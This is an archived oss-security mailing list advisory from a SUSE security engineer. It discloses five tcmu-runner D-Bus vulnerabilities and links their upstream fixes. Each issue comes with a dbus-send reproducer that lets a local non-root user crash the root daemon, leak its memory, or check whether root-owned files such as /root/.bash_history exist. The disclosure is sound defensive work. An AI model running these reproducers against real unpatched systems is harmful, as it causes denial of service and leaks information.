'[oss-security] tcmu-runner: multiple vulnerabilities in tcmu-runner daemon allowing local DoS, infor'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] tcmu-runner: multiple vulnerabilities in tcmu-runner daemon allowing local DoS, infor
From:       Matthias Gerstner <mgerstner () suse ! de>
Date:       2017-07-24 10:12:04
Message-ID: 20170724101204.GA22772 () f195 ! suse ! de
[Download RAW message or body]


A security audit of tcmu-runner's D-Bus service implementation showed a
number of security issues.

I've requested CVEs for these issues, request is still pending. I will
update once I've got them.

It seems upstream will remove the D-Bus interface completely from the
tcmu-runner daemon in the future.

Package: https://github.com/open-iscsi/tcmu-runner

------------------------------------------------------------------------
glfs handler allows local DoS via crafted CheckConfig strings
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_glfs.so and cause various kinds of segmentation faults,
depending on the string passed to the method.

For example the "hosts" variable in glfs_check_config() is not zero
initialized, but always freed on error, causing invalid free and/or
invalid memory accesses.

References:

- The check_config callback implementation was recently removed upstream
  in this commit:

  https://github.com/open-iscsi/tcmu-runner/commit/61bd03e600d2abf309173e9186f4d465bb1b7157

- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049485

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/glfs \
org.kernel.TCMUService1.CheckConfig string:something # -> tcmu-runner daemon will have crashed \
with segmentation fault

------------------------------------------------------------------------
UnregisterHandler dbus method in tcmu-runner daemon for non-existing
handler causes DoS
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of an unknown tcmu runner handler as parameter and cause a NULL
pointer dereference.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/e2d953050766ac538615a811c64b34358614edce
                
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049488

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
/org/kernel/TCMUService1/HandlerManager1 \
org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:fake_handler # -> tcmu-runner \
daemon will have crashed with segmentation fault



------------------------------------------------------------------------
UnregisterHandler D-Bus method in tcmu-runner daemon for internal
handler causes DoS
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of a handler loaded internally in tcmu-runner via dlopen() and
cause a NULL pointer dereference resulting in DoS.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/bb80e9c7a798f035768260ebdadffb6eb0786178
                
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049489

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user, it will attempt to unregister the
# locally loaded qcow handler
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
/org/kernel/TCMUService1/HandlerManager1 \
org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:qcow # -> tcmu-runner daemon \
will have crashed with segmentation fault


------------------------------------------------------------------------
Memory leaks can be triggered in tcmu-runner daemon by calling D-Bus
method for (Un)RegisterHandler
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
RegisterHandler or UnregisterHandler methods implemented in the
tcmu-runner daemon to trigger memory leaks. Done so repeatedly would
cause a root daemon to hog memory, possibly resulting in DoS for the
daemon itself or other system components that fail to acquire memory as
a result.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/7a78eda52d973d3edc06fea84ad874678d6055f0
                
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049490

Reproducer:

# *stop* the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run the tcmu-runner service as root in valgrind
valgrind --max-stackframe=2097208 --leak-check=full /usr/bin/tcmu-runner
# run this dbus command multiple times as a regular user (this will trigger
# the leak in RegisterHandler)
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
/org/kernel/TCMUService1/HandlerManager1 \
org.kernel.TCMUService1.HandlerManager1.RegisterHandler string:0memory string:stuff # ctrl-c \
the valgrind process and you'll see an amount of "definitely lost" # bytes. when doing the same \
without the dbus-send calls this sould be zero # "definitely lost" bytes



------------------------------------------------------------------------
qcow handler opens up an information leak via the CheckConfig D-Bus
method
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_qcow.so and exploit an information leak by passing in arbitrary
filenames to check.

This allows a local user to check for the existence of root owned files,
which might enable more serious security issues in combination with
other security flaws in a system.

References:

- upstream fix:

  This one is difficult to fix, upstream asked me to remove all
  check_config callbacks instead:

  https://github.com/open-iscsi/tcmu-runner/commit/8cf8208775022301adaa59c240bb7f93742d1329

- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049491

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/qcow \
org.kernel.TCMUService1.CheckConfig string://root/.bash_history # this will return True if \
/root/.bash_history exists, False otherwise

Regards

Matthias

-- 
Matthias Gerstner <matthias.gerstner@suse.de>
Dipl.-Wirtsch.-Inf. (FH), Security Engineer
https://www.suse.com/security
Telefon: +49 911 740 53 290

SUSE Linux GmbH 
GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nuernberg)


["signature.asc" (application/pgp-signature)]

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic